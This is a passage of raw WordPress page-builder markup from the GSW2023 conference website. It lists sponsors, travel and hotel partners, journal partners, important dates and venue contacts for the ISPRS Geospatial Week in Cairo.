css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 